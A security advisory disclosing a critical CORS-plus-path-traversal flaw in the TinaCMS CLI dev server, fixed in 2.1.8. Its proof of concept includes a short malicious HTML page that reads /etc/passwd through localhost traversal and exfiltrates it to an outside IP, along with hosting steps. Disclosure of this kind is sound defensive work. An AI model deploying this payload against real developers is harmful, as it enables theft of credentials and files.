GitHub_M·CWE-22·Published 2026-03-12
Tina is a headless content management system. Prior to 2.1.8, the TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developers' machines simply by tricking them into visiting a malicious website while tinacms dev is running. This vulnerability is fixed in 2.1.8.
## Summary

The TinaCMS CLI dev server combines a permissive CORS configuration (`Access-Control-Allow-Origin: *`) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developers' machines simply by tricking them into visiting a malicious website while `tinacms dev` is running.

## Details

The TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests:

- packages/@tinacms/cli/src/server/server.ts:

  ```ts
  app.use(cors());
  ```

- packages/@tinacms/cli/src/next/vite/plugins.ts:

  ```ts
  server.middlewares.use(cors());
  ```

When combined with the path traversal vulnerability, this creates a complete attack chain.

## Attack Scenario

### Prerequisites

1. Developer runs `tinacms dev` (default port 4001)
2. Developer visits attacker's website while TinaCMS is running

**No other conditions required.** The dev server doesn't need to be:

- Exposed to the internet
- Bound to 0.0.0.0
- Accessible outside localhost

### Attack Flow

1. Developer starts TinaCMS: `tinacms dev`
2. Developer browses the web (checking email, social media, etc.)
3. Developer unknowingly visits an attacker-controlled page (malicious ad, compromised site, etc.)
4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files
5. Files are exfiltrated to the attacker's server

## PoC

### Attacker's Malicious Website (evil.html)

```html
<script>
fetch('http://localhost:4001/../../../etc/passwd')
  .then(r => r.text())
  .then(data => {
    // Exfil via GET
    const img = new Image();
    img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data);
  });
</script>
```

### Demonstration

**Step 1:** Start TinaCMS dev server

```bash
tinacms dev
# Server running on http://localhost:4001
```

**Step 2:** Host evil.html on attacker server

```bash
python3 -m http.server 8000
```

**Step 3:** Developer visits `http://attacker-server:8000/evil.html`

**Result:** The browser makes cross-origin requests to localhost:4001. Because `cors()` returns `Access-Control-Allow-Origin: *`, the browser allows the JavaScript to read the responses. Directory listings from outside the media directory are sent to the attacker's server.

<img width="1900" height="366" alt="image" src="https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617" />

## Impact

### Who is affected

Every developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required: the default setup is exploitable.

### What an attacker achieves

By hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently:

1. **Enumerate the developer's filesystem:** directory listings via `/media/list/` with path traversal reveal file and folder names across the entire filesystem
2. **Discover sensitive files:** locate `.env`, `.git/config`, SSH keys, cloud credentials, database configs
3. **Write arbitrary files:** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts
4. **Delete arbitrary files:** via `/media/` DELETE with path traversal
| CVSS Version | Type | Source | Base Score | Exploitability | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | cve.org | 9.7 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
| 3.1 | Secondary | NVD | 9.6 | 2.8 | 6.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
| 3.1 | Secondary | GHSA | 9.6 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |